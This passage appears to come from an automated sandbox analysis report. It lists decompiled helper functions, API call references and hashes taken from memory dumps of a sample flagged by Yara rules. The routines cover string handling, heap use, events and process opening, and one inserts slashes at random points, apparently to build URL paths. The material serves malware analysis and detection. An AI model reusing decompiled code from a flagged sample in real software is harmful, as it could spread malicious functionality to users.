            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
            • String ID:
            • API String ID: 2559942907-0
            • Opcode ID: 1a1fd677edc58eec955eaf1d3993d56ae221aa6c08d04917edf056d461287d89
            • Instruction ID: 8dc8ac0fbf8ed74809347083b524f9d48ca475b647df918ea8963d70540d00fd
            • Opcode Fuzzy Hash: 1a1fd677edc58eec955eaf1d3993d56ae221aa6c08d04917edf056d461287d89
            • Instruction Fuzzy Hash: 8A214173D02199EBCB20AFE698898DE77A9AB1C350B05C439EA11B7101D63DA94587A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E4461 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
            Download Yara Rule
            C-Code - Quality: 78%
            			E007E4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E007E33DC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














            0x007e446d
            0x007e4471
            0x007e4472
            0x007e4473
            0x007e4475
            0x007e4477
            0x007e447a
            0x007e447f
            0x007e4516
            0x007e451d
            0x007e451d
            0x007e4488
            0x007e448f
            0x007e449f
            0x007e449f
            0x007e44a5
            0x007e44a7
            0x007e44ac
            0x007e44b5
            0x007e44bb
            0x007e44c0
            0x007e44cb
            0x007e44cf
            0x007e44d1
            0x007e44d2
            0x007e44db
            0x007e44df
            0x007e44f0
            0x007e44e1
            0x007e44e6
            0x007e44eb
            0x007e44fa
            0x007e44fa
            0x007e44cf
            0x007e4500
            0x007e4506
            0x007e4506
            0x007e450f
            0x007e4514
            0x007e4514
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeSleepStringlstrlenmemcpy
            • String ID:
            • API String ID: 1198164300-0
            • Opcode ID: 5385ece81c3fb011ae4be39ca3e8805415acc33264b530415b1fec8b9dc3fb8d
            • Instruction ID: 66066028aaec121d81259319af27f6dc2298ff6ea5020ad78a5a2c4f4edb1e19
            • Opcode Fuzzy Hash: 5385ece81c3fb011ae4be39ca3e8805415acc33264b530415b1fec8b9dc3fb8d
            • Instruction Fuzzy Hash: 87214175A0224AEFCB11DFA5D988D9EBBB5FF4D314B108169E905D7310EB34DA11CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E2708 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E007E2708(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x7ea2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x7ea2f0; // 0x7e8a86b2
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x7ea2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















            0x007e2710
            0x007e2713
            0x007e2719
            0x007e2731
            0x007e2733
            0x007e2738
            0x007e273a
            0x007e273d
            0x007e273f
            0x007e2742
            0x007e2744
            0x007e2744
            0x007e2746
            0x007e2751
            0x007e2756
            0x007e2767
            0x007e276f
            0x007e2774
            0x007e2777
            0x007e277a
            0x007e277c
            0x007e277f
            0x007e2782
            0x007e2782
            0x007e2785
            0x007e2790
            0x007e2795
            0x007e279f

            APIs
            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,007E6708,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E2713
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 007E272B
            • memcpy.NTDLL(00000000,02F19600,-00000008,?,?,?,007E6708,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E276F
            • memcpy.NTDLL(00000001,02F19600,00000001,007E3ECE,00000000,02F19600), ref: 007E2790
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: memcpy$AllocateHeaplstrlen
            • String ID:
            • API String ID: 1819133394-0
            • Opcode ID: d9a2e20f8a1eaaf1a1509b333654d0e02d3dddd46ee54cac0b716864f0ec77c7
            • Instruction ID: 0acea40364ae7481e4762a49f46398810d24521b0c076fe870850dc3de018710
            • Opcode Fuzzy Hash: d9a2e20f8a1eaaf1a1509b333654d0e02d3dddd46ee54cac0b716864f0ec77c7
            • Instruction Fuzzy Hash: 6B113A72A01249BFC3108B69CC84D9E7BBEEBC8360B154175F604DB151E7789E008390
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E23C4 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMON
            Download Yara Rule
            C-Code - Quality: 64%
            			E007E23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E007E3A63(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x7ea348; // 0x272d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x7eb50c; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x7eb8d8; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E007E5B56();
					_push( &_v64);
					if( *0x7ea100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E007E5B56();
				}
				return _t28;
			}














            0x007e23c4
            0x007e23cb
            0x007e23d9
            0x007e23dd
            0x007e23e7
            0x007e23ec
            0x007e23f1
            0x007e23f6
            0x007e2400
            0x007e240a
            0x007e240a
            0x007e2402
            0x007e2402
            0x007e2402
            0x007e2402
            0x007e2410
            0x007e2416
            0x007e2417
            0x007e241a
            0x007e241d
            0x007e2420
            0x007e2428
            0x007e2431
            0x007e2439
            0x007e2439
            0x007e243b
            0x007e243d
            0x007e243d
            0x007e2447

            APIs
              • Part of subcall function 007E3A63: SysAllocString.OLEAUT32(00000000), ref: 007E3ABD
              • Part of subcall function 007E3A63: SysAllocString.OLEAUT32(0070006F), ref: 007E3AD1
              • Part of subcall function 007E3A63: SysAllocString.OLEAUT32(00000000), ref: 007E3AE3
            • memset.NTDLL ref: 007E23E7
            • GetLastError.KERNEL32 ref: 007E2433
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AllocString$ErrorLastmemset
            • String ID: <$E~~
            • API String ID: 3736384471-4260617627
            • Opcode ID: cee6cfa07df6a9d823c6f79cf304ff0488fc13f5d0eff09cef0de0f662418824
            • Instruction ID: bff1e2a9fd115e02780eda79b86156758b3f6c03bf2240a7c61050894be4149c
            • Opcode Fuzzy Hash: cee6cfa07df6a9d823c6f79cf304ff0488fc13f5d0eff09cef0de0f662418824
            • Instruction Fuzzy Hash: FA014471902298ABC711DFA5D885EDE7BBCBB0C744F408126F904E7251E7789D418B95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E7843 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E7843(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






            0x007e784d
            0x007e7851
            0x007e7866
            0x007e7868
            0x007e786d
            0x007e7873
            0x007e7875
            0x007e787a
            0x007e7885
            0x007e787c
            0x007e787c
            0x007e787c
            0x007e787a
            0x007e7893

            APIs
            • memset.NTDLL ref: 007E7851
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,74CF81D0,00000000,00000000), ref: 007E7866
            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007E7873
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,007E3F34,00000000,?), ref: 007E7885
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CreateEvent$CloseHandlememset
            • String ID:
            • API String ID: 2812548120-0
            • Opcode ID: e8ba754321fa0d76379bb6702bd95a73184834f040af4f8b79eed377cbb55d8b
            • Instruction ID: 2019429e5f7a6aab41ce0db5ccf62249afe913604f2bf2f0d8613538a0c04ed3
            • Opcode Fuzzy Hash: e8ba754321fa0d76379bb6702bd95a73184834f040af4f8b79eed377cbb55d8b
            • Instruction Fuzzy Hash: 07F089B110534C7FD3145F26DCC4C27BB9CEB992987114D3EF14295511C679AC05CA60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00781FCF Relevance: 6.0, APIs: 4, Instructions: 40COMMON
            Download Yara Rule
            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00781C63), ref: 00781FDE
            • GetVersion.KERNEL32(?,00781C63), ref: 00781FED
            • GetCurrentProcessId.KERNEL32(?,00781C63), ref: 00782009
            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00781C63), ref: 00782022
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: 65ba2c1b2af24db351cab05015b2526afc50c83ea666487d2bddc43ce56fae15
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 08F08CB05853009BE750AF78BE0DB553F64B795753F000036E641FA1E4D7748982CB5C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E3230 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E3230() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x7ea30c; // 0x248
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x7ea35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x7ea30c; // 0x248
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x7ea2d8; // 0x2b20000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








            0x007e3230
            0x007e3237
            0x007e3281
            0x007e3283
            0x007e3283
            0x007e323b
            0x007e3241
            0x007e3246
            0x007e324a
            0x007e3250
            0x007e3257
            0x00000000
            0x00000000
            0x007e3259
            0x007e325e
            0x00000000
            0x00000000
            0x00000000
            0x007e325e
            0x007e3260
            0x007e3268
            0x007e326b
            0x007e326b
            0x007e3271
            0x007e3278
            0x007e327b
            0x007e327b
            0x00000000

            APIs
            • SetEvent.KERNEL32(00000248,00000001,007E109A), ref: 007E323B
            • SleepEx.KERNEL32(00000064,00000001), ref: 007E324A
            • CloseHandle.KERNEL32(00000248), ref: 007E326B
            • HeapDestroy.KERNEL32(02B20000), ref: 007E327B
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CloseDestroyEventHandleHeapSleep
            • String ID:
            • API String ID: 4109453060-0
            • Opcode ID: ad54a20e490997a4fe1dbf412f33eb566b9d588fe008c6b4bdd6c708fd547d0d
            • Instruction ID: e01d00c176da7efa3c15dd812527ebac64732ddcc55180ab39c1957e1d3b63fa
            • Opcode Fuzzy Hash: ad54a20e490997a4fe1dbf412f33eb566b9d588fe008c6b4bdd6c708fd547d0d
            • Instruction Fuzzy Hash: 42F01C76A032D2A7DB109B769DCCA823BECBB0C761B048110BE00EF2E1DB2CE9409564
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E607C Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 37%
            			E007E607C() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x7ea3cc; // 0x2f19600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x7ea3cc; // 0x2f19600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x7ea3cc; // 0x2f19600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x7eb142) {
					HeapFree( *0x7ea2d8, 0, _t10);
					_t7 =  *0x7ea3cc; // 0x2f19600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









            0x007e607c
            0x007e6085
            0x007e6095
            0x007e6095
            0x007e609a
            0x007e609f
            0x00000000
            0x00000000
            0x007e608f
            0x007e608f
            0x007e60a1
            0x007e60a6
            0x007e60aa
            0x007e60bd
            0x007e60c3
            0x007e60c3
            0x007e60cc
            0x007e60ce
            0x007e60d2
            0x007e60d8

            APIs
            • RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E6085
            • Sleep.KERNEL32(0000000A), ref: 007E608F
            • HeapFree.KERNEL32(00000000), ref: 007E60BD
            • RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E60D2
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID:
            • API String ID: 58946197-0
            • Opcode ID: ec8eda5081d7d54a434c31e46d8d3ea68cdca125fd5f0ccb8929f33a7a3788ba
            • Instruction ID: 6070a7e3727724372c658cf116b8cb0e64d29e309436fd728e00738250ce7cb5
            • Opcode Fuzzy Hash: ec8eda5081d7d54a434c31e46d8d3ea68cdca125fd5f0ccb8929f33a7a3788ba
            • Instruction Fuzzy Hash: 17F0DA75202282ABE714CF56DCC9E157BB5EB5C751B08C014EA02DF3B0D73CAC44DA2A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040F001 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: __aulldvrm
            • String ID:
            • API String ID: 1302938615-3916222277
            • Opcode ID: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
            • Instruction ID: 0b4e2962642302af5baa7ab99a723a4d0387960a43f5b709c9065034346dd514
            • Opcode Fuzzy Hash: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
            • Instruction Fuzzy Hash: 09919F35900229DADB319A64CD883EAB3B4AF54314F1402FED819776D2D7B95ECACF48
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E2058 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E007E2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E007E33DC(_t2);
				if(_t34 != 0) {
					_t30 = E007E33DC(_t28);
					if(_t30 == 0) {
						E007E61DA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E007E7AE9(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E007E7AE9(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














            0x007e2058
            0x007e2062
            0x007e2064
            0x007e206a
            0x007e206a
            0x007e2073
            0x007e2077
            0x007e2083
            0x007e2087
            0x007e20fb
            0x007e2089
            0x007e2089
            0x007e208d
            0x007e2092
            0x007e2097
            0x007e20b1
            0x007e20a0
            0x007e20a0
            0x007e20a4
            0x007e20a7
            0x007e20ac
            0x007e20ac
            0x007e20b6
            0x007e20de
            0x007e20e4
            0x007e20e7
            0x007e20b8
            0x007e20ba
            0x007e20c2
            0x007e20cd
            0x007e20d2
            0x007e20d2
            0x007e20ee
            0x007e20f5
            0x007e20f6
            0x007e20f6
            0x007e2087
            0x007e2106

            APIs
            • lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?,?,74CF81D0), ref: 007E2064
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
              • Part of subcall function 007E7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,007E2092,00000000,00000001,00000001,?,?,007E51F7,?,?,?,?,00000102), ref: 007E7AF7
              • Part of subcall function 007E7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?,?,74CF81D0,00000000), ref: 007E7B01
            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?), ref: 007E20C2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 007E20D2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 007E20DE
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
            • String ID:
            • API String ID: 3767559652-0
            • Opcode ID: 5c1a1bc83f1cee53aefe2146e8adf470f3e6f3760e34b92a42aca016f0d952d2
            • Instruction ID: 00adfb303a0fcdf1d8dc30e2161f587dbe1245c679021d2d9651750d85c93891
            • Opcode Fuzzy Hash: 5c1a1bc83f1cee53aefe2146e8adf470f3e6f3760e34b92a42aca016f0d952d2
            • Instruction Fuzzy Hash: 8721D872506299EBCB115F76CC48B9F7FBCDF0D350B148054F9059B202D639DA41C7A1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E5DE4 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E007E33DC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








            0x007e5df9
            0x007e5dfd
            0x007e5e07
            0x007e5e0c
            0x007e5e11
            0x007e5e13
            0x007e5e1b
            0x007e5e20
            0x007e5e2e
            0x007e5e33
            0x007e5e3d

            APIs
            • lstrlenW.KERNEL32(004F0053,?,74CB5520,00000008,02F19270,?,007E52D0,004F0053,02F19270,?,?,?,?,?,?,007E68B6), ref: 007E5DF4
            • lstrlenW.KERNEL32(007E52D0,?,007E52D0,004F0053,02F19270,?,?,?,?,?,?,007E68B6), ref: 007E5DFB
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • memcpy.NTDLL(00000000,004F0053,74CB69A0,?,?,007E52D0,004F0053,02F19270,?,?,?,?,?,?,007E68B6), ref: 007E5E1B
            • memcpy.NTDLL(74CB69A0,007E52D0,00000002,00000000,004F0053,74CB69A0,?,?,007E52D0,004F0053,02F19270), ref: 007E5E2E
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrlenmemcpy$AllocateHeap
            • String ID:
            • API String ID: 2411391700-0
            • Opcode ID: 7f4b30aa0ee847fe91ea79d412471542d62ccae12830c1fc0cd2ebb61a727460
            • Instruction ID: 5c8b607cd72c865037e3f519467e636a8d4e6f8e8eba7fbc09909a669c8d32d7
            • Opcode Fuzzy Hash: 7f4b30aa0ee847fe91ea79d412471542d62ccae12830c1fc0cd2ebb61a727460
            • Instruction Fuzzy Hash: 50F03C3290111DFB8F119FA9CC89C8E7BADEF082547114062F90497101E635EA108BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E7563 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
            Download Yara Rule
            APIs
            • lstrlen.KERNEL32(02F19C38,00000000,00000000,00000000,007E3EF9,00000000), ref: 007E7573
            • lstrlen.KERNEL32(?), ref: 007E757B
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • lstrcpy.KERNEL32(00000000,02F19C38), ref: 007E758F
            • lstrcat.KERNEL32(00000000,?), ref: 007E759A
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
            • String ID:
